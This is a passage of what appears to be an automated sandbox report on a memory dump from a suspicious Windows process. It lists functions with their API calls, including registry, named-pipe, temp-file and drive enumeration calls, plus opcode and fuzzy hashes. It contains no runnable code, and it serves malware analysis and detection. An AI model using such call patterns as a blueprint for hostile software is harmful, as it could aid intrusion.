API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
String ID:
API String ID: 3772355505-0
Opcode ID: a07ff7611baa4990c4f9e0b26d21b09792d6a959cc1343b455465b8331cb2a7d
Instruction ID: 4800aa3dcade3b0791260d3cb2c8fd191767edb925af4f0bdcc210588c3fb722
Opcode Fuzzy Hash: a07ff7611baa4990c4f9e0b26d21b09792d6a959cc1343b455465b8331cb2a7d
Instruction Fuzzy Hash: A73188B690521AAFD720EFA4ECC4D66BBECEF09354B048526E805CB251DB35F904CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03365CC1, Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 033642A9: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 033642EE
Part of subcall function 033642A9: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 03364306
Part of subcall function 033642A9: WaitForSingleObject.KERNEL32(00000000,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 033643CE
Part of subcall function 033642A9: HeapFree.KERNEL32(00000000,74E5F5B0,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 033643F7
Part of subcall function 033642A9: HeapFree.KERNEL32(00000000,?,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 03364407
Part of subcall function 033642A9: RegCloseKey.ADVAPI32(?,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 03364410

lstrcmp.KERNEL32(?,00000000), ref: 03365D38
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,033553C6,00000000,00000000), ref: 03365D64
GetCurrentThreadId.KERNEL32 ref: 03365E15
GetCurrentThread.KERNEL32 ref: 03365E26
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0336076C,033553C6,00000001,74E5F730,00000000,00000000), ref: 03365E63
HeapFree.KERNEL32(00000000,?,?,00000000,?,0336076C,033553C6,00000001,74E5F730,00000000,00000000), ref: 03365E77
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03365E85
wsprintfA.USER32 ref: 03365E9D

Part of subcall function 0335EECA: lstrlen.KERNEL32(?,00000000,00000000,00000008,0334B933,00000000,?,00000000,74E05520,00000000,?,03346E27,?,?,?,00000000), ref: 0335EED4
Part of subcall function 0335EECA: lstrcpy.KERNEL32(00000000,?), ref: 0335EEF8
Part of subcall function 0335EECA: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,00000000,74E05520,00000000,?,03346E27,?,?,?,00000000,?), ref: 0335EEFF
Part of subcall function 0335EECA: lstrcat.KERNEL32(00000000,?), ref: 0335EF56

lstrlen.KERNEL32(00000000,00000000), ref: 03365EA8
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03365EBF
HeapFree.KERNEL32(00000000,00000000), ref: 03365ED0
HeapFree.KERNEL32(00000000,?), ref: 03365EDC

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID:
API String ID: 773763258-0
Opcode ID: 012951819a5d349a8c5b6bc5940144e6e1fad6bbdd9f11c4813c9d85b00db676
Instruction ID: 82a394a51e1a8d63ee87da98bb45454e5a5e1d0388062d78de870b6eff4eb497
Opcode Fuzzy Hash: 012951819a5d349a8c5b6bc5940144e6e1fad6bbdd9f11c4813c9d85b00db676
Instruction Fuzzy Hash: 5B711276D00219EFDB21EFA5DC88DEEBBB9FB09310F048069E505A7264D730AA51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0335C4DA, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,74E05520,?,00000000,?,00000000), ref: 0335C4F0
lstrlen.KERNEL32(?), ref: 0335C4F8
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0335C508
lstrcpy.KERNEL32(00000000,?), ref: 0335C527
lstrlen.KERNEL32(?), ref: 0335C53C
lstrlen.KERNEL32(?), ref: 0335C54A
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 0335C598
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 0335C5BC
lstrlen.KERNEL32(?), ref: 0335C5EF
HeapFree.KERNEL32(00000000,?,?), ref: 0335C61A
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 0335C631
HeapFree.KERNEL32(00000000,?,?), ref: 0335C63E

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID:
API String ID: 904523553-0
Opcode ID: 1c0379a9a27fe9f4cff5d0eaf02dfbac5e81674eea66883c946e4cd4fc1288f6
Instruction ID: 09cad438c4283e507ec3c63d55a04ca437276bdaf6d6f75d52a5a964256e9252
Opcode Fuzzy Hash: 1c0379a9a27fe9f4cff5d0eaf02dfbac5e81674eea66883c946e4cd4fc1288f6
Instruction Fuzzy Hash: 8D41773290024AAFCF22DFA6CCC0EAEBBBAEB44314F18446AF81597150D774EA51CF50

Uniqueness

Uniqueness Score: -1.00%

Function 033498D6, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03349908
WaitForSingleObject.KERNEL32(000004DC,00000000), ref: 0334992A
ConnectNamedPipe.KERNEL32(?,?), ref: 0334994A
GetLastError.KERNEL32 ref: 03349954
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03349978
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 033499BB
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 033499C4
WaitForSingleObject.KERNEL32(00000000), ref: 033499CD
CloseHandle.KERNEL32(?), ref: 033499E2
GetLastError.KERNEL32 ref: 033499EF
CloseHandle.KERNEL32(?), ref: 033499FC
RtlExitUserThread.NTDLL(000000FF), ref: 03349A12

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: d76eb7d89a05cb9b9b8da8609bda9386f1a8ac3a0f2ca1435c41c9dfd27cd320
Instruction ID: a464b2f1d5b71f97409fc265c477af9186b292f29feb571275a68dbf94d1023b
Opcode Fuzzy Hash: d76eb7d89a05cb9b9b8da8609bda9386f1a8ac3a0f2ca1435c41c9dfd27cd320
Instruction Fuzzy Hash: 4B316B71408709AFD710EF65CCC8A6BBBADFB44324F004A29F965D21A4D774E9058E92

Uniqueness

Uniqueness Score: -1.00%

Function 03346D8C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 03346DB6
GetCurrentThreadId.KERNEL32 ref: 03346DCC
GetCurrentThread.KERNEL32 ref: 03346DDD

Part of subcall function 0335E55D: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E56F
Part of subcall function 0335E55D: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF), ref: 0335E588
Part of subcall function 0335E55D: GetCurrentThreadId.KERNEL32 ref: 0335E595
Part of subcall function 0335E55D: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E5A1
Part of subcall function 0335E55D: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03367545,00002334), ref: 0335E5AF
Part of subcall function 0335E55D: lstrcpy.KERNEL32(00000000), ref: 0335E5D1

Part of subcall function 0334B917: lstrlen.KERNEL32(00000000,00000001,00000000,?,?,00000001,?,00000000,74E05520,00000000,?,03346E27,?,?,?,00000000), ref: 0334B982
Part of subcall function 0334B917: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000001,?,00000000,74E05520,00000000,?,03346E27,?,?,?,00000000), ref: 0334B9AA

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,?,?,?), ref: 03346E57
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,?,00000000,00000000,?,?,?), ref: 03346E63
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03346EB2
wsprintfA.USER32 ref: 03346ECA
lstrlen.KERNEL32(00000000,00000000), ref: 03346ED5
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03346EEC

Strings

W, xrefs: 03346E9F

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: W
API String ID: 630447368-655174618
Opcode ID: d65887f7867fb933c054f926f358da917b8b1cab6f0ed784e9142b8ed0abdd0c
Instruction ID: 8a8006567438ca2717904d9348e169b9f39650924b0311f3f8f71ca71af5fdda
Opcode Fuzzy Hash: d65887f7867fb933c054f926f358da917b8b1cab6f0ed784e9142b8ed0abdd0c
Instruction Fuzzy Hash: C6413675900219EFCF21EFA1DDC4DAEBBFDEF46744F044016E50596124D734AA90DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03365651, Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0336567C

Part of subcall function 0336622F: RegCloseKey.ADVAPI32(?,03346102), ref: 033662B6

RegOpenKeyA.ADVAPI32(80000001,03346102,?), ref: 033656B7
lstrcpyW.KERNEL32(-00000002,03371460), ref: 03365719
lstrcatW.KERNEL32(00000000,?), ref: 0336572E
lstrcpyW.KERNEL32(?), ref: 03365748
lstrcatW.KERNEL32(00000000,?), ref: 03365757

Part of subcall function 03365AD8: lstrlenW.KERNEL32(00000000,00000000,?,03365776,00000000,?,?,?,03346102), ref: 03365AEB
Part of subcall function 03365AD8: lstrlen.KERNEL32(03365776,?,03365776,00000000,?,?,?,03346102), ref: 03365AF6
Part of subcall function 03365AD8: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 03365B0B

RegCloseKey.ADVAPI32(03346102,?,03346102,00000000,?,?,?,03346102), ref: 033657C1

Part of subcall function 0334D44C: lstrlenW.KERNEL32(00000000,?,00000000,00000000,?,?,0334DB20,00000000,00000000,03352461,00000000,00000000,7764DBB0,00000020,00000000), ref: 0334D458
Part of subcall function 0334D44C: memcpy.NTDLL(00000000,00000000,00000000,00000106,?,?,0334DB20,00000000,00000000,03352461,00000000,00000000,7764DBB0,00000020,00000000), ref: 0334D480
Part of subcall function 0334D44C: memset.NTDLL ref: 0334D492

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,03346102), ref: 033657F6
GetLastError.KERNEL32(?,?,03346102), ref: 03365801
HeapFree.KERNEL32(00000000,00000000,?,?,03346102), ref: 03365817
RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,03346102), ref: 03365829

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID:
API String ID: 1430934453-0
Opcode ID: 964f7239257a56d54ca7464459c1d8b996e2e15e7ee73251a17ab01672cdbed4
Instruction ID: 81f1dd48c40e019135c842f9b2d58036b2cb2265c8d3a163e3c5ba024deb6c19
Opcode Fuzzy Hash: 964f7239257a56d54ca7464459c1d8b996e2e15e7ee73251a17ab01672cdbed4
Instruction Fuzzy Hash: 3C514A76900209EFEB21EBA1DCC4EAABBBDEF45344F148165F901E6258D734EA41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0335598F, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 033559C5
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 033559DA
RegCreateKeyA.ADVAPI32(80000001,?), ref: 03355A02
HeapFree.KERNEL32(00000000,?), ref: 03355A43
HeapFree.KERNEL32(00000000,?), ref: 03355A53
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03355A66
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03355A75
HeapFree.KERNEL32(00000000,?,0335C581,00000000,?,?,?,?), ref: 03355ABF
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0335C581,00000000,?,?,?,?), ref: 03355AE3
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0335C581,00000000,?,?,?,?), ref: 03355B08
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0335C581,00000000,?,?,?,?), ref: 03355B1D

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: dafc887a3fe32370ff50ea82f87eb57d675fe1063c0c444bf1c744cf6fd2ce4c
Instruction ID: 7e402ed26a3fb8dce702615a3ecc41e58905c70d258bd3c8a949d9802048a755
Opcode Fuzzy Hash: dafc887a3fe32370ff50ea82f87eb57d675fe1063c0c444bf1c744cf6fd2ce4c
Instruction Fuzzy Hash: F0518D76C00219EFDF21EF95DCC48AEBBB9FB09344F14446AF915A2220D335AA94DF61

Uniqueness

Uniqueness Score: -1.00%

Function 03361C67, Relevance: 16.6, APIs: 11, Instructions: 95memoryregistrystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 03361C78
GetTempPathA.KERNEL32(00000000,00000000,?,?,0334CD4A,00000094,00000000,00000000,?), ref: 03361C90
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 03361C9F
GetTempPathA.KERNEL32(00000001,00000000,?,?,0334CD4A,00000094,00000000,00000000,?), ref: 03361CB2
GetTickCount.KERNEL32 ref: 03361CB6
wsprintfA.USER32 ref: 03361CCD
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03361D08
StrRChrA.SHLWAPI(00000000,00000000,?), ref: 03361D28
lstrlen.KERNEL32(00000000), ref: 03361D32
RegCloseKey.ADVAPI32(?), ref: 03361D4E
HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 03361D5C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
String ID:
API String ID: 1404517112-0
Opcode ID: 24fdbd8a4d6ebc98b66c331c96080cc1dee56e735414635b9f571d46a2136f5d
Instruction ID: 8f595c41e4a6a89016c8e2c0c16f43b67e325eb77d022a92238a4dc532a04fe7
Opcode Fuzzy Hash: 24fdbd8a4d6ebc98b66c331c96080cc1dee56e735414635b9f571d46a2136f5d
Instruction Fuzzy Hash: 60314476900218FFDB21AFA1DCC8DAB7FACEF45355F008026F90AD6119DB349A55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03342E19, Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 03342E4D
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 03342E59
RtlAllocateHeap.NTDLL(00000000,?), ref: 03342E6A
memset.NTDLL ref: 03342E87
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 03342E95
WaitForSingleObject.KERNEL32(00000000), ref: 03342EA3
GetDriveTypeW.KERNEL32(?), ref: 03342EB1
lstrlenW.KERNEL32(?), ref: 03342EBD
wcscpy.NTDLL ref: 03342ECF
lstrlenW.KERNEL32(?), ref: 03342EE9
HeapFree.KERNEL32(00000000,?), ref: 03342F02

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID:
API String ID: 3888849384-0
Opcode ID: 7733c8ac61027c76bbc00ddddd2c5c36090d228deb7fee8a83b65827d95e13b7
Instruction ID: e66392f8bc658fb483c5bdd3aa8f63be1d6864a39aed34cbbd1ec75d9863d266
Opcode Fuzzy Hash: 7733c8ac61027c76bbc00ddddd2c5c36090d228deb7fee8a83b65827d95e13b7
Instruction Fuzzy Hash: 32310476C04108BFDB11EBA5DCC88AEBBBDEB08354B108466F511E2120DB35AE559F60

Uniqueness

Uniqueness Score: -1.00%

Function 033618BD, Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 033618D4
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,0334CEE6,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 033618E6
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,0334CEE6,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 033618F3
wsprintfA.USER32 ref: 0336190E
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,?,00000000,00000094,00000000), ref: 03361924
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0336193D
WriteFile.KERNEL32(00000000,00000000), ref: 03361945
GetLastError.KERNEL32 ref: 03361953
CloseHandle.KERNEL32(00000000), ref: 0336195C
GetLastError.KERNEL32(?,00000000,?,0334CEE6,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 0336196D
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0334CEE6,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 0336197D

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID:
API String ID: 3873609385-0
Opcode ID: 6493303108038c774d1dfc19fd4d5012901a4cad84af032240fa20e08ae36cd8
Instruction ID: a9d594366671c7f19e9c2a7bf9bb19da7d455f808b2e3dfb8fa94b7b5dd339fa
Opcode Fuzzy Hash: 6493303108038c774d1dfc19fd4d5012901a4cad84af032240fa20e08ae36cd8
Instruction Fuzzy Hash: 5A11D272548618BFE221BB62ACCCF7BBFACEB42365F048125F956D2148DB640D458AF1

Uniqueness

Uniqueness Score: -1.00%

Function 0334F84F, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,74E05520,00000000), ref: 0334F866
lstrlen.KERNEL32(?,?,?,?,?,74E05520,00000000), ref: 0334F876
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0334F8AA
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0334F8D5
memcpy.NTDLL(00000000,?,?,?,?,?,?,?,?,?,74E05520,00000000), ref: 0334F8F4
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,74E05520,00000000), ref: 0334F955
memcpy.NTDLL(?,00000000, Ut,00000000,?,?,?,?,?,?,?,?,?,?,?,74E05520), ref: 0334F977

Strings

W, xrefs: 0334F9A3
Ut, xrefs: 0334F868, 0334F964, 0334F92F, 0334F884, 0334F96F

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: Ut$W
API String ID: 3204852930-540753543
Opcode ID: 06eb43abaffd92e54c9b0ca377ae5a58dafc03ba39ef2eeced624f75e688e891
Instruction ID: 2ca3f46ad59acaca34f06013f81d05b846ffc8030ce02e88b2fbbaa1063c2545
Opcode Fuzzy Hash: 06eb43abaffd92e54c9b0ca377ae5a58dafc03ba39ef2eeced624f75e688e891
Instruction Fuzzy Hash: 3F4119B1D00209EFDF11DF95CCC4AAEBBB9EF44344F188069E914A7214E735EA548F61

Uniqueness

Uniqueness Score: -1.00%

Function 0334FC07, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,7673D3B0,00000000,74E05520), ref: 0334FC38
StrChrA.SHLWAPI(00000001,0000002C), ref: 0334FC4B
StrTrimA.SHLWAPI(?,?), ref: 0334FC6E
StrTrimA.SHLWAPI(00000001,?), ref: 0334FC7D
lstrlen.KERNEL32(?), ref: 0334FCB2
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0334FCC5
lstrcpy.KERNEL32(00000004,?), ref: 0334FCE3
HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 0334FD07

Strings

W, xrefs: 0334FC1D

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: W
API String ID: 1974185407-655174618
Opcode ID: b51c38d60c26c32a5246590e7bb00f11ceed674e2fe9a1707e19848665f6d6f5
Instruction ID: 8a60fd3cf26ff04f4e5689fdbaf24dd9d4cb3d933c29f6a626f00a5824aac200
Opcode Fuzzy Hash: b51c38d60c26c32a5246590e7bb00f11ceed674e2fe9a1707e19848665f6d6f5
Instruction Fuzzy Hash: 28315D35900215EFDB21EFA9DCC4E9ABFFDEF06740F188056E905DB214D774A9418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03344776, Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0644C988,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 03344799
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 033447A8
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 033447B5
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 033447CD
lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 033447D9
RtlAllocateHeap.NTDLL(00000000,?), ref: 033447F5
wsprintfA.USER32 ref: 033448D7
memcpy.NTDLL(00000000,?,?), ref: 03344924
InterlockedExchange.KERNEL32(03371188,00000000), ref: 03344942
HeapFree.KERNEL32(00000000,00000000), ref: 03344983

Part of subcall function 0335B1DC: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0335B205
Part of subcall function 0335B1DC: memcpy.NTDLL(00000000,?,?), ref: 0335B218
Part of subcall function 0335B1DC: RtlEnterCriticalSection.NTDLL(03371488), ref: 0335B229
Part of subcall function 0335B1DC: RtlLeaveCriticalSection.NTDLL(03371488), ref: 0335B23E
Part of subcall function 0335B1DC: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0335B276

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID:
API String ID: 4198405257-0
Opcode ID: 476af86259896c2cfe11bb4977c75a9acc4db11b253c4906253a34e1cffa2fda
Instruction ID: 036bf04645b4364cc3d6ff11810840a9731628ee56b75040c7358c5633fe918c
Opcode Fuzzy Hash: 476af86259896c2cfe11bb4977c75a9acc4db11b253c4906253a34e1cffa2fda
Instruction Fuzzy Hash: 43615976A00249EFCB20DFA6DCC4FAA7BEDEB08301F048529F815EB250D774AA55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0335A458, Relevance: 15.1, APIs: 10, Instructions: 110librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,74E5F5B0,0335683A,?,?,?,?,?,?,?,033477C7,?), ref: 0335A478
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335A482
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335A4AB
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335A4B9
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335A4C7
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335A4D5
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335A4E3
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335A4F1
___HrLoadAllImportsForDll@4.DELAYIMP ref: 0335A51B
HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,033477C7,?), ref: 0335A59C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Load$Library$AllocDll@4FreeHeapImports
String ID:
API String ID: 1792504554-0
Opcode ID: 8d0337e987838f511cf1cf36dee30a1bf81b1149e2a3b98f3954bdb71fcfbb1b
Instruction ID: 88a32b290a04b365d34a3c2475aa5658fb806c4808f354270323de24dfae6407
Opcode Fuzzy Hash: 8d0337e987838f511cf1cf36dee30a1bf81b1149e2a3b98f3954bdb71fcfbb1b
Instruction Fuzzy Hash: DB417E76D00219EFCB21EFE8DCC4E9AB7FCAB08301F154966E916DB254D334AA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0334E04D, Relevance: 15.1, APIs: 10, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000001), ref: 0334E071

Part of subcall function 0336622F: RegCloseKey.ADVAPI32(?,03346102), ref: 033662B6

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,03346102), ref: 0334E0A0
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,03346102), ref: 0334E0B1
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0334E0EB
RegCloseKey.ADVAPI32(?,?,?,03346102), ref: 0334E116
RtlEnterCriticalSection.NTDLL(00000000), ref: 0334E12C
HeapFree.KERNEL32(00000000,?,?,?,03346102), ref: 0334E141
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0334E155
HeapFree.KERNEL32(00000000,?,?,?,03346102), ref: 0334E16A
RegCloseKey.ADVAPI32(?,?,?,03346102), ref: 0334E173

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID:
API String ID: 4138089493-0
Opcode ID: 1fdff3399f7dd1d1d04db6249a1d3c0e500a4ffda8b3cf5b69a41c914bc0ad72
Instruction ID: 3b8ac50acdefdcc60e93559143ec2646d820640a2f43519c119ca7011771ea1c
Opcode Fuzzy Hash: 1fdff3399f7dd1d1d04db6249a1d3c0e500a4ffda8b3cf5b69a41c914bc0ad72
Instruction Fuzzy Hash: B5311536900108FFCB21ABA5ECC8D9ABBBDFB48304F148155F615D6114D735AA85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0335B608, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0335B618
CreateFileW.KERNEL32(0334CCEC,80000000,00000003,03371248,00000003,00000000,00000000,?,0334CCEC,?,?,?,00000000), ref: 0335B635
GetLastError.KERNEL32(?,0334CCEC,?,?,?,00000000), ref: 0335B6DD

Part of subcall function 03344375: lstrlen.KERNEL32(?,00000000,?,00000027), ref: 033443AB
Part of subcall function 03344375: lstrcpy.KERNEL32(00000000,00000000), ref: 033443CF
Part of subcall function 03344375: lstrcat.KERNEL32(00000000,00000000), ref: 033443D7

GetFileSize.KERNEL32(0334CCEC,00000000,?,0334CCEC,?,?,?,00000000), ref: 0335B668
CreateFileMappingA.KERNEL32(0334CCEC,03371248,00000002,00000000,00000000,0334CCEC), ref: 0335B67C
lstrlen.KERNEL32(0334CCEC,?,0334CCEC,?,?,?,00000000), ref: 0335B698
lstrcpy.KERNEL32(?,0334CCEC), ref: 0335B6A8
GetLastError.KERNEL32(?,0334CCEC,?,?,?,00000000), ref: 0335B6B0
HeapFree.KERNEL32(00000000,0334CCEC,?,0334CCEC,?,?,?,00000000), ref: 0335B6C3
CloseHandle.KERNEL32(0334CCEC,?,0334CCEC), ref: 0335B6D5

Memory Dump Source

